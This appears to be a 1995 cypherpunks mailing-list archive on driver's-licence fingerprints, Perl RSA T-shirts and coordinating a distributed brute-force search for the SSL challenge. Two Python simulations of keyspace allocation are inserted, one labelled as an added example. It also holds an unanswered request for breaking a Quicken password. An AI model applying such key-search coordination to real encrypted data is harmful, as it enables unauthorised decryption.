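        self.done = {}         # searcher -> number of segments reported
        self.found = None      # (searcher, key) once a verified key arrives

    def quota(self, searcher):
        # Outstanding-segment limit grows with demonstrated work (assumed rule).
        return 1 + self.done.get(searcher, 0) // 4

    def request(self, searcher):
        held = sum(1 for who in self.owner.values() if who == searcher)
        if self.found or held >= self.quota(searcher):
            return None
        eligible = sorted(s for s in self.unassigned
                          if searcher not in self.history.get(s, ()))
        if not eligible:
            return None
        seg = self.rng.choice(eligible)      # random, not sequential, allocation
        self.unassigned.remove(seg)
        self.owner[seg] = searcher
        self.history.setdefault(seg, set()).add(searcher)
        return seg

    def report(self, searcher, seg, candidate=None):
        if self.owner.get(seg) != searcher:
            return False                     # only the assignee may report
        del self.owner[seg]
        self.done[searcher] = self.done.get(searcher, 0) + 1
        if candidate is not None and self.verify(candidate):
            self.found = (searcher, candidate)   # the server decides what a hit is
            return True
        self.naked.add(seg)
        if len(self.naked) == self.n:        # all NAKed, no key: start over
            self.round += 1
            self.naked.clear()
            self.unassigned = set(range(self.n))
        return True

SECRET, SEG_SIZE, N_SEGMENTS = 677, 128, 8   # constructed toy challenge

def is_key(k):
    return k == SECRET       # stand-in for a trial decryption of the challenge

def search(seg):
    keys = range(seg * SEG_SIZE, (seg + 1) * SEG_SIZE)
    return next((k for k in keys if is_key(k)), None)

def run_scenario(seed=0):
    """One searcher NAKs every segment without reporting the key; an honest
    searcher then finds it after the restart."""
    server, log = SegmentServer(N_SEGMENTS, is_key, seed), {}
    seg = server.request("mallory")
    log["second_request_while_holding"] = server.request("mallory")
    log["bob_reports_mallorys_segment"] = server.report("bob", seg)
    while seg is not None:
        server.report("mallory", seg)        # NAK, whatever the segment held
        seg = server.request("mallory")
    log["round_after_all_naks"] = server.round
    log["mallory_in_round_1"] = server.request("mallory")
    while not server.found:
        seg = server.request("alice")
        server.report("alice", seg, search(seg))
    log["found"] = server.found
    return log

if __name__ == "__main__":
    for name, value in run_scenario().items():
        print(f"{name}: {value}")
```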




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael H. Warfield <mhw@wittsend.com>
Date: Tue, 29 Aug 95 12:50:15 PDT
To: WOOD@VAX2.ROCKHURST.EDU
Subject: Re: Joel's RSA-t's
In-Reply-To: <01HUN7RYOMZM003M4J@VAX2.ROCKHURST.EDU>
Message-ID: <m0snW0o-0001puC@wittsend.com>
MIME-Version: 1.0
Content-Type: text/plain


WOOD@VAX2.ROCKHURST.EDU enscribed thusly:
> 
> > 
> > On Josh Osborne's RSA-perl T-shirt venture,
> >
> > I don't know about the rest of you, but I didn't realise from Joel's
> > last post to the list that he was taking orders for then.  I guess
> > that's as close to an announcement as he's going to make.  I just
> > checked his netstuff web page, and he's taking orders now!
> > 
> > Check out:
> > 
> > 	http://www.danger.com/ad-perl.html
> > 
> > (this is referenced from Joel's netstuff page under currently
> > available items:
> > 
> > 	http://www.danger.com/netstuff.html
> > )
> > 
> > From the Joel's web page:
> > 
> > > DEADLINE TO ORDER: All orders for these shirts must be postmarked by
> > > June 1, 1995.
> > 
> > Also my page on perl-rsa is:
> > 
> > 	http://dcs.ex.ac.uk/~aba/perl-rsa.html
> > 
> > I'll be away from my mail for the rest of this week, so maybe someone
> > can post this info to all the crypto groups...


> Has anyone received a shirt from Joel?  Or is he ripping people off?

> Many thanks,

	Don't know about Joel.  Might have heard one complaint over on
alt.security.pgp a month or so ago.  I just got 7 perl-rsa T-Shirts
from "wepinsto" (http://colossus.net/wepinsto/).  These were for myself,
my youngest son (16), my brother, and four friends who asked me to
order for them.  They look great!  Almost as great as the looks you
GET when people see them wondering "what the *&*r!".

	I just have one problem though...  If these things are classified
as a "munition" aka a "weapon" by da fed's how does that affect us down
here in good old Georgia where our legislature has passed a law making
it a crime to be in possession of a weapon anywhere within a hundred yards
or so of school property.  This is rather relevant for my teenager!
The school counselors looked real confused and said "Dah...  We don't
know!"  I'm supposed to talk to the man "in charge of discipline" for an
opinion on this.  As I told someone else on another mailing list, this
sounds REAL stupid but all it takes is one idiot (and we have a plentiful
supply of idiots down here in Georgia) with a wild hair and students
get expelled for silverware sitting on a car seat, tools such as tire
irons (no they weren't threatening someone with one), or cultural and
ceremonial artifacts.

	Mike
-- 
 Michael H. Warfield    |  (770) 985-6132   |  mhw@WittsEnd.com
  (The Mad Wizard)      |  (770) 925-8248   |  http://www.wittsend.com/mhw/
  NIC whois:  MHW9      |  An optimist believes we live in the best of all
 PGP Key: 0xDF1DD471    |  possible worlds.  A pessimist is sure of it!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Tue, 29 Aug 95 14:14:35 PDT
To: cypherpunks@toad.com
Subject: Re: A glance at the future of missing child identification
In-Reply-To: <ac67e8b60f021004f508@[205.199.118.202]>
Message-ID: <p83QwkkAsimJ084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 28 Aug 1995, tcmay@got.net (Timothy C. May) wrote:

> At 4:48 PM 8/28/95, Jason L Tibbitts III wrote:
> >Believe it or not, something like this is being used (or is being prepared
> >for use) in breast implants.  An article in the Houston (silicone city)
> >Chronicle about a month ago (sorry, I can't produce a more exact reference)
> >stated that new soybean oil breast implants are being manufactured to
> >accept an identification device to track information on the patient and the
> >implanting doctor.

> Big Brother? Big Sister? Naw, it's "Big Tits."

Or "Twin PKCS."  This may explain Anne Taylor Fleming's apparent confusion
on a recent MacNeil/Lehrer segment -- she repeatedly referred to Cliff
Stoll's latest excoriation of cyberspace as _Silicone Snake Oil_, remember?

Maybe she's heard rumors about the Justice Dept. investigating an
impending Microsoft-DuPont merger to corner the market...

Sorry, but it's slow with so many folks in Aspen or Santa Barbara.


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com
Date: Tue, 29 Aug 95 16:18:07 PDT
To: The Gate <gate@id.WING.NET>
Subject: Re: Searchnet
In-Reply-To: <Pine.3.89.9508291310.S13049-0100000@dialin1.wing.net>
Message-ID: <Pine.SUN.3.91.950829150614.13330C@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 29 Aug 1995, The Gate wrote:

> 
> 	Some time ago, I posted a reply to an allegation that the 
> Spotlight was a Klan paper. 
> 
> 	Of course, it is more Liberty Lobby/CIA

Oh boy, my two favorites: (1) racist, anti-semitic scum and (2)
international mass-murderer-trainers and baby-torturers. 

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 29 Aug 95 12:28:05 PDT
To: Alan Olsen <alano@teleport.com>
Subject: Re: Florida Drivers Permits and a Hello
In-Reply-To: <199508291905.MAA04950@desiree.teleport.com>
Message-ID: <199508291927.PAA20067@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



The Florida drivers license conversation has gotten a bit afield of
cryptography.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Tue, 29 Aug 95 14:01:51 PDT
To: Dave <d-jones@ix.netcom.com>
Subject: Re: Florida Drivers Permits and a Hello
In-Reply-To: <199508291933.MAA22876@ix3.ix.netcom.com>
Message-ID: <Pine.SOL.3.91.950829165337.3285A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


And somebody, Science Applications International Corp. I think, is 
designing an in-car fingerprint reader / database query-er for cops.  So 
they can check your bona fides on the road sides.

bd


On Tue, 29 Aug 1995, Dave wrote:

> 
> >What possible value could the LEAs get by having your thumbprint digitally
> >encoded on your driver's license?  It's not like the average cop-on-the-beat
> >is qualified to lift a fingerprint and compare it.  Even if he was, how
> >does it benefit that the fingerprint is on the license?
> >
> >This seems silly.
> 
> There are devices that will electronically read fingerprints available now.  So
> with such a device, the LEO would know instantly if you were who you said
> that you were.
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Patrick Lear <plear@pimlico.ekrl.com>
Date: Tue, 29 Aug 95 17:49:10 PDT
To: cypherpunks@toad.com
Subject: Announcing SecureDrive 2.4 (fwd)
Message-ID: <Pine.SUN.3.91.950829174625.7812B-100000@pimlico>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone have any experience with the SecureDrive program and if so 
can you make any comments about it?

I've been looking for something like this for a while and I'd also like 
to know which other programs compare / are better / are worse if any.

Thanks for any input ...

Patrick Lear, Sui Juris




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Zamick <JonathanZ@consensus.com>
Date: Tue, 29 Aug 95 17:46:25 PDT
To: cypherpunks@toad.com
Subject: Re: Florida Drivers Permits and a Hello
Message-ID: <v0213050aac69747dc574@[157.22.240.11]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:15 PM 8/29/95, Mark wrote:
>>What possible value could the LEAs get by having your thumbprint digitally
>>encoded on your driver's license?  It's not like the average cop-on-the-beat
>>is qualified to lift a fingerprint and compare it.  Even if he was, how
>>does it benefit that the fingerprint is on the license?
>
>Here it is possible to walk into a suitably equipped police station, put your
>fingertips on a sensor pad and in a few seconds, if records exist, have them appear
>on the computer screen. Extrapolating this it isn't a big step for a patrol
>car, already equipped with a packet radio link to HQ and a data terminal,
>to scan in your fingerprint and check it. If the system was offline they could
>easily take your print and compare it to that on your license. It's just a
>little more proof that the license is linked to you.
>

My only question though is why help them create more records about the
average citizen?

Jonathan

------------------------------------------------------------------------
..Jonathan Zamick                    Consensus Development Corporation..
..<JonathanZ@consensus.com>                      1563 Solano Ave, #355..
..                                             Berkeley, CA 94707-2116..
..                                        o510/559-1500  f510/559-1505..
..Mosaic/WWW Home Page:                                               ..
..  Consensus Home Page  ..






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Patrick Lear <plear@pimlico.ekrl.com>
Date: Tue, 29 Aug 95 17:51:56 PDT
To: cypherpunks@toad.com
Subject: Locked out of Quicken - HELP!
Message-ID: <Pine.SUN.3.91.950829175058.7812C-100000@pimlico>
MIME-Version: 1.0
Content-Type: text/plain



I recently created a new file in Quicken and used a password to protect 
it from prying eyes (I know ... it isn't very strong encryption ... and I 
hope it isn't) but now I can't remember the @#$%^!!@#$#@$% password.

Does anyone have any suggestions regarding how to break in?

Thanks,

Patrick Lear, Sui Juris




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@cybrspc.mn.org (Roy M. Silvernail)
Date: Tue, 29 Aug 95 22:11:34 PDT
To: bdolan@use.usit.net (Brad Dolan)
Subject: Re: Florida Drivers Permits and a Hello
In-Reply-To: <Pine.SOL.3.91.950829165337.3285A-100000@use.usit.net>
Message-ID: <950829.180249.8r3.rnr.w165w@cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, bdolan@use.usit.net writes:

> And somebody, Science Applications International Corp. I think, is 
> designing an in-car fingerprint reader / database query-er for cops.  So 
> they can check your bona fides on the road sides.

The company I know definitely is on this is Digital Biometrics, Inc,
located in Minnetonka, Minnesota.  Their device is called a SQUID (and
no, I don't know what the acronym stands for).  About 8" long and
roughly 2.5" squarish, it has a lens in front where the subject's thumb
is placed, and scans the lens with a laser.  It's not quite in
production yet, although prototypes are under construction.  I happen to
work for the company doing the machining work.
- -- 
           Roy M. Silvernail     [ ]      roy@cybrspc.mn.org
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@cybrspc.mn.org

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBMEOdVhvikii9febJAQEu+QQAlDHh+rt+iyJ3Yi41B1InvtECalLA2spR
Kl15Z/Fr2/WciRX7/VjHb2WQYxJ98psZlL37QeAWYDZ/PmfaCaknGd6rTgSyl3Vl
itMSdfxB6eMpEAcJUQMPzB083i2MXDqdzAMBjWaw6FrYBKJ9+Rx12SZXz7UAFEz9
8nU5IBZ0Im0=
=B9lj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alano@teleport.com (Alano@teleport.com)
Date: Wed, 20 Sep 95 16:25:31 PDT
To: cypherpunks@toad.com
Subject: RE: FLORIDA DRIVERS PERMITS AND A HELLO
Message-ID: <9509201546185279@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Tue, 29 Aug 1995 12:06:42 -0700
To: cypherpunks@toad.com
From: Alan Olsen <alano@teleport.com>
Subject: Re: Florida Drivers Permits and a Hello 

At 01:47 PM 8/29/95 -0500, you wrote:
>Alan Olsen writes
>>They would not have to include an entire thumbprint.  The actual code used
>>to verify fingerprints is not very large.  All that would be needed is
>>enough information to ID into the "official" records and enough checksum
>>type information to prevent alteration/counterfeiting.  Using magnetic media
>>for this is a bit foolish as it can be changed/destroyed with the stroke of
>>a magnet.  I will not say by what means I would think should suit as a
>>better encoding scheme because: 1) They are not using it and 2) I do not
>>want to give them any ideas.
>
>What possible value could the LEAs get by having your thumbprint digitally
>encoded on your driver's license?  It's not like the average cop-on-the-beat
>is qualified to lift a fingerprint and compare it.  Even if he was, how
>does it benefit that the fingerprint is on the license?
>
>This seems silly.

I was pointing out that it was possible.  I was not trying to make the point
that there was any *USE* for such a thing.  (Evidently some ID cards now
carry such prints. California does, if memory serves me correctly.)

Just because something is silly does not mean it will not be tried by
someone in law enforcement.  In fact, there seems to be a correlation between
silly acts and law enforcement...  (Or at least those making the rules about
law enforcement.)  And if you think it cannot get any worse, Pete "I want to
seal the borders" Wilson has announced he is running for president.  We will
be getting a large number of silly laws and pronouncements if the American
people are stupid enough to elect him to high office.

>
>
|            Visualize whirled keys!              | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites    | Disclaimer:          |
|all mankind free in one-key-stenography-privacy!"| Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A.Back@exeter.ac.uk
Date: Tue, 29 Aug 95 11:33:19 PDT
To: WOOD@VAX2.ROCKHURST.EDU
Subject: Joel's RSA-t's
In-Reply-To: <01HUN7RYOMZM003M4J@VAX2.ROCKHURST.EDU>
Message-ID: <25850.199508291832@olib>
MIME-Version: 1.0
Content-Type: text/plain



David Wood <WOOD@VAX2.ROCKHURST.EDU> writes:
> I wrote (quite some time ago now, ~4 months?):
> > that's as close to an announcement as he's going to make.  I just
> > checked his netstuff web page, and he's taking orders now!
> > 
> > Check out:
> > 
> > 	http://www.danger.com/ad-perl.html
> > 
> > (this is referenced from Joel's netstuff page under currently
> > available items:
> > 
> > 	http://www.danger.com/netstuff.html
> > )
> > 
> > From the Joel's web page:
> > 
> > > DEADLINE TO ORDER: All orders for these shirts must be postmarked by
> > June 1, 1995.
>
> Has anyone received a shirt from Joel?

He made an announcement on the netstuff mailing list a couple of weeks
ago, and also made a statement about the reasons for delays on the
group alt.fan.joel-furr, here's what he said ... (darn it's expired
from news spool), what he said was that he hoped to get all of the
shirts shipped by the end of this month I think.  Don't quote me on
that cos it's from memory.  But basically his printer moved, causing
1.5 months delay, and he got more orders than anticipated 1500 would
you believe!

Ah... there's more on his current netstuff page:

	http://www.danger.com/netstuff-current.html

> o  Perl/RSA T-Shirts -- Second Batch. Note: The first batch should be
>    done very soon and all 1,500 shirts will be shipped as fast as
>    possible. Some one-time delays took place that could not be avoided
>    and all the shirts should be shipped by the end of August unless
>    something awful happens.

Should answer your question, A: RSN.

Adam
--
HAVE *YOU* EXPORTED RSA TODAY? --> http://dcs.ex.ac.uk/~aba/rsa/
--rsa--------------------------8<-------------------------------
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
-------------------------------8<-------------------------------
TRY: rsa -k=3 -n=7537d365 < msg | rsa -d -k=4e243e33 -n=7537d365




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vznuri@netcom.com (Vznuri@netcom.com)
Date: Wed, 20 Sep 95 16:25:29 PDT
To: cypherpunks@toad.com
Subject: SSL keyspace etc.
Message-ID: <9509201546195281@ci.diamond-bar.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


Date: Tue, 29 Aug 95 12:40:08 -0700
From: "Vladimir Z. Nuri" <vznuri@netcom.com>

regarding SSL challenge, I am not following this close enough 
to understand completely, but I thought I would offer a few suggestions
for tweaking the code:

--

the issue of grabbing keyspace has been raised. what if someone
malicious just yanked huge areas of keyspace and didn't search them?
it seems that the clients need to return to the server some evidence
that they have searched their keyspace in question. the server could
verify this evidence. for those that don't return the "evidence", that
keyspace could be reallocated to other comers.

the simple approach to all this, if you don't have "evidence", is to 
just have the server keep reallocating the same space over and over
to different crackers. hopefully eventually every part of the keyspace
would be allocated to a "legitimate" worker.

--

the issue of efficiency is very fascinating for this project. essentially
the server has no idea what the block size of key blocks it should dole
out. obviously the server would want to try to dole out equal *processing
chunks* such that the remote machine reports back in a certain amount
of time, no matter what architecture. the problem of course is that remote
machines all have different efficiency.

two possibilities: a sort of "bogomip" calculation is done in the client,
and its processor speed is reported to the server. the server uses
this in a calculation to determine how much to dole out. it could try 
to derive a best fit linear relationship between space covered and
processor speed, or build up a table of results and interpolate for
new requests.

note that the efficiency issue also ties into "what if people take
keys they don't solve". if the server knows roughly how long a client
should take to report back, and it never reports back, it could then
reallocate that key space.

--

another problem of efficiency is that the server is clearly a bottleneck
for servicing requests. the question arises: suppose that the server
could determine the precise interval between which machines would
go back to it for new keys. what is the optimum interval over the
whole project? in other words, given the number of machines participating,
and their processor speeds, what size of key space should be parceled
out to the next request so that the bottleneck at the server is
minimized? this optimum interval must be very hard to derive, because
it depends on the contention based on many incoming connections. it
would involve some probabilistic approximations of the likelihood
of collisions. 

to model it, you might consider a request as taking [n] seconds of
time, and consider that if any two requests are in contention, a 
retry happens after [m] seconds. you could build up models that
would try to minimize the time based on empirical simulations. 
however I would be exceedingly impressed if someone could derive
a formula for this, or give it from some textbook. 

--

adaptive algorithms for all these situations are possible. the server
could use a "hypothesis" in the sense of partitioning out a starting
size of keyspace, and then watch how long it took the client machine to respond
and then assume a linear relationship or something to compute the size
of the next keyspace to hand out to the machine. the server could continually
watch how closely its "hypothesis" (i.e. its estimations of how long a
given machine will take) match the actual returns.

--

more on the idea of evidence: we are working with a hashing algorithm,
right? as evidence the client machines could return checksums of all
the hashes of all the keyspace it searched. it could break up its
own search space into blocks and return the checksums on the hashes
for each block. the server, if it wanted to, could verify these blocks
running its own computations. if it ever found a client was "unreliable",
it could then diminish the keys sent to the unreliable client, or even
send it areas of search space it didn't care about anymore (i.e. areas
that have already been confirmed searched by a more "reliable" client).

--

in fact all this reminds me of the process of intelligence gathering
by an agency, which could be formalized as follows: suppose that
the agency wishes to identify "quality information". it has a set
of sources, A,B,C,D....  now, it can send questions out to these
sources and get information from them. some of them however would
be "unreliable". the agency must devise some means by which it can
weed out the unreliable sources. note that this may even involve
sending them bogus instructions to keep them busy so they do not
themselves suspect they have been "discovered" and then change
their defective plans.

obviously, one of the most important intelligence tools in this
matter is that of *correlation*. you have to determine "truth"
(or "quality information") via the correlation between answers that
the different sources give you. also important to correlation is
*redundancy*. you sometimes have to ask more than one source the
same question, and test the answer. in this model, if A and B
give different answers, you know that one of A or B is "unreliable".

what is very interesting in our case of cracking keys is that the
server can verify the information on its own. in other words, it
has a *control* that it knows is correct that it can judge against
the answers "out there". unfortunately, in contrast, real intelligence
agencies are not always privy to this kind of certain "control" and
in fact have to determine "truth" entirely from a set of sources,
any of which might be unreliable. in this case one has to have
a hypothesis about what is the "truth" and test it to see if it
holds up consistently with all information.

the approaches of attackers are obvious. the most obvious is that
of collusion and infiltration. but I will save the rest for some
NSA spook to elaborate. there are certainly enough colluding and
infiltrating on this list <g>

--

one of the reasons all this interests me is that it really reminds me
of some projects I have worked on in the past. in high school I wrote
a network mandelbrot set program (client/host). the issue of contention
arose and it appeared to me to look like an upside-down parabola after
I plotted some points (curving up, that is). i.e. the optimum was at
the pit of the parabola, and when too few or too many requests happened,
the speed over the overall simulation was increased above the optimum.
some very ingenious readers may actually be able to locate this 
code, which I put in the public domain over 5 years ago.

--

another thing I worked on was trying to find the optimal block size
of communications protocols such as Zmodem, which generally instead
just pick arbitrary block sizes 2^n. I actually was able to attack
this problem analytically through the observations of the properties
of infinite series and calculus techniques. it is a similar problem
but the idea of contention really complicates this issue. (for what
I studied, there was only one client and one server, so to speak).

I still have this paper in Latex format and if anyone is interested
I would be happy to send it to you. it's a really nice example, IMHO,
of how if you use your brain and some mathematics, you can really
get a far more elegant approach than brute force, and know with 
much greater certainty  that what you are doing makes sense 
mathematically.

an awful lot of programmers just tend to bang on the keyboard without
thinking of the theoretical implications of their work. this is
understandable given that the theoretical implications of even trivial
programs (such as the SSL client/server interactions) can be 
mathematically extremely daunting, requiring even differential 
equations to model fairly simple pieces of code.

--

well, that is my contribution of the moment into the cypherpunk 
annals. one never knows what a little combination of boredom 
and inspiration can lead to.

--V.Z.Nuri
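
Added example, not part of the post above and not the SSL challenge's own code: a sketch of the server-side checks the message proposes (per-block checksums as evidence, a spot check recomputed by the server, reallocation of overdue segments, and sizing the next segment from the measured rate). SHA-256 stands in for the real key trial, and `BLOCK`, `TARGET_SECONDS` and all class and function names are assumptions.

```python
import hashlib
import random

BLOCK = 256             # keys per evidence block (constructed value)
TARGET_SECONDS = 10.0   # how long the server wants one assignment to take

def trial(key):
    """Stand-in for one key trial; a real search would run the cipher here."""
    return hashlib.sha256(key.to_bytes(8, "big")).digest()

def block_checksum(start, count):
    """Checksum over the trial outputs for keys [start, start + count)."""
    h = hashlib.sha256()
    for key in range(start, start + count):
        h.update(trial(key))
    return h.hexdigest()

def honest_evidence(start, count):
    """What a client that really searched the segment sends back."""
    return [block_checksum(s, BLOCK) for s in range(start, start + count, BLOCK)]

def fake_evidence(start, count):
    """What a client that took the segment without searching might send."""
    return [hashlib.sha256(b"unsearched %d" % s).hexdigest()
            for s in range(start, start + count, BLOCK)]

class Server:
    def __init__(self, seed=1995):
        self.rng = random.Random(seed)
        self.next_key = 0
        self.requeue = []        # segments to hand out again
        self.outstanding = {}    # client -> (start, count, issued_at, decoy)
        self.rate = {}           # client -> measured keys per second
        self.unreliable = set()
        self.done = []           # segments confirmed searched

    def assign(self, client, now):
        if client in self.unreliable and self.done:
            # Keep a flagged client busy on space that is already confirmed.
            start, count = self.rng.choice(self.done)
            self.outstanding[client] = (start, count, now, True)
            return start, count
        if self.requeue:
            start, count = self.requeue.pop(0)
        else:
            rate = self.rate.get(client)
            if rate is None:
                count = 4 * BLOCK   # starting "hypothesis" for a new client
            else:
                count = max(BLOCK, int(rate * TARGET_SECONDS) // BLOCK * BLOCK)
            start = self.next_key
            self.next_key += count
        self.outstanding[client] = (start, count, now, False)
        return start, count

    def report(self, client, evidence, now):
        start, count, issued, decoy = self.outstanding.pop(client)
        if decoy:
            return "ignored"
        blocks = count // BLOCK
        i = self.rng.randrange(blocks)   # block to verify, chosen after the report
        ok = (len(evidence) == blocks and
              evidence[i] == block_checksum(start + i * BLOCK, BLOCK))
        if not ok:
            self.unreliable.add(client)
            self.requeue.append((start, count))
            return "rejected"
        # Linear model: the rate seen on this segment sizes the next one.
        self.rate[client] = count / max(now - issued, 1e-6)
        self.done.append((start, count))
        return "accepted"

    def reap(self, now, grace=3.0):
        """Reallocate segments whose client is long overdue."""
        for client, (start, count, issued, decoy) in list(self.outstanding.items()):
            if now - issued > grace * TARGET_SECONDS:
                del self.outstanding[client]
                if not decoy:
                    self.requeue.append((start, count))

def demo():
    srv = Server()
    seg_fast = srv.assign("fast", 0.0)
    seg_liar = srv.assign("liar", 0.0)
    srv.assign("silent", 0.0)                       # never reports back
    results = [srv.report("fast", honest_evidence(*seg_fast), 2.0),
               srv.report("liar", fake_evidence(*seg_liar), 0.1)]
    srv.reap(31.0)
    return srv, results

if __name__ == "__main__":
    server, outcome = demo()
    print(outcome, server.requeue, server.rate)
```

A rejected report never updates the client's rate, so a client cannot inflate its next allocation by answering quickly with invented checksums.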





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ILSI <gene@ilsi.com>
Date: Tue, 29 Aug 95 19:48:21 PDT
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <9508300248.AA02999@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


     We would like to ask you to place a link from your site to our 
homepage.  Please check out our homepage and let us know what you think.

     We have created a database to assist people that want to advertise on 
the internet.  Using this database, people with homepages will now be able 
to easily find appropriate sites for links to their homepage.

     We are Internet List Services Inc. and we would appreciate your help. 
 Please visit us at:  http://www.ilsi.com/ilsi5.html



     Thank you,

     Gene










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Tue, 29 Aug 95 18:01:35 PDT
To: don@cs.byu.edu
Subject: Re: SSL search attacks
In-Reply-To: <199508292102.PAA01897@wero>
Message-ID: <9508300101.AA11637@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


don@cs.byu.edu writes
>From: Scott Brickner <sjb@austin.ibm.com>
>
>>The problems in the current system were to be expected of a first
>>attempt.  In the future:  Only the server assigns segments, only the
>>assignee may report the status of a segment, and after all segments are
>>NAKed we know condition 1 has occurred, at which time we start over,
>>but never assign the same segment to the same searcher.  Limit the
>>number of segments which may be outstanding with one searcher at one
>>time as a function of work rate.  Deploy redundant servers.
>
>BEAAAT STATE! Push 'em back.. WAAAAAAY BAAAACK. 
>(relevant comments follow)

I suppose this does seem like a "statist" protocol, but let's look at
the purpose.  The whole idea of the central server was to permit a
*coordinated* attack on the key.  We've established that there is a 1/e
cost factor in removing the central server.  I just threw out these
items as specific changes which could defend against the identified
attack modes *without* losing the benefit of the central coordination.

In order for the coordinator to be successful, there must be a
mechanism to ensure that someone who knows the key can't break the
system by just reporting "I searched this segment and didn't find it."
This means that the server should consider such statements as
irrelevant, unless it was the *server* who suggested that the user
search the space.  This makes the likelihood of the key's segment being
assigned to a "bad guy" pretty low.

The server *could* take unsolicited NAKs "under advisement", and hand
them out at a slower rate than unACKed segments, but this still allows
the "result hoarder" to slow down the attack.

>In regard to both messages, I think that with sequentially allocated
>keyspace an attacker who knows the real key would have trouble getting the
>right segment unless s/he grabbed a big enough piece. If the search is
>restarted, we know something's up.  Ensuring that nobody gets to search
>keyspace they searched before would be one improvement.

Hence the prohibition against (as Tim put it) "J. Random User claiming
keyspace".

>A random (instead
>of sequential) allocation _by the keyserver_ (out of unallocated 
>piecemeal segments) would also take some work to implement. 

I don't think it would really be that hard, if one were willing to go
with less than "cryptographic" strength in the PRNG, which I don't think
is really necessary here.

The problem is that it's irrelevant to the problem.  Random allocation
at the server is equivalent to simply "shuffling" the segments before
assignment, which doesn't affect the rate at which the space is searched.

>From: tcmay@got.net (Timothy C. May)
>>On the negative side, ostracize or punish those who bite off more than they
>>can chew. This approach is fraught with dangers.
>
>If the search wraps around to catch the UNACK'ed pieces, this type of
>oversight will only slow down the actual discovery of the key. Failure
>to report a found key, though, is a bit different. I would not be opposed
>to having my program report possible hits, with the server being what
>discovers if I've found it or not.

I'm not sure I follow you, here.  The search wraps around on the unACKed
segments because the work was assigned, but not (as far as the server
knows) completed.  This doesn't slow down the discovery of the key,
it just reflects the *real* composite key testing rate as opposed to
the *apparent* rate (which is based on the rate at which the segments
are assigned).  The server doesn't consider a segment "done" until it
gets an ACK or NAK.

>>On the positive side, let everyone simply attack the keyspace as they see
>>fit, picking random parts to attack. This should not be "worse" than a
>>factor of several from a "perfectly coordinated" attack. (I haven't spent
>>time calculating this, but my intuition is that a random attack, with
>>overlapping keyspace, is not a lot less efficiently attacked than
>>attempting to arrange for no overlaps...just based on my mental picture of
>>dropping line segments randomly on some interval and figuring coverage of
>>the line segment.)

NB: Elsewhere, Tim provides an argument showing the efficiency of the
random attack to be 1/e worse than the coordinated attack (about 37%).

>Why not have a random backup-mode, in case someone does mount a denial of
>service attack. Or employ a combination of the two modes. The machines
>running brloop can search sequentially (out of the middle 50%?) and the
>machines not connected search randomly (out of the outside 50%?). Or,
>venturing further into the I-wonder-who's-gonna-code-this world, log the
>random searches for possible conversion to an exhaustive search later. 
>
>It would be nice to be able to hit the emergency button and switch to
>random mode, but currently I don't think there's a need to actually
>use it.

I still don't see how the server can use unsolicited NAKs as anything
other than a nominal reduction in the probability that the key is in
the NAKed segment.  Perhaps this does give an idea of a server strategy
to do *just* that, though.

The server maintains a list of the unique users who have reported an
unsolicited NAK for each segment.  Requests for work are filled by
randomly selecting segments, with the highest weight going to the
segments with the fewest unsolicited NAKs, but only segments with
*solicited* NAKs and those assigned, but with no response, are not
considered.

If the weight were inversely proportional to the square of the number
of unsolicited NAKs (plus one), then segments which have a lot of NAKs
won't likely be assigned until the end of the jobs.

When a segment with unsolicited NAKs is assigned, further weight might
be given to unsolicited NAKs from those users in the future, reflecting
an improvement in their reputation.

The biggest problem with this scenario is that it requires a
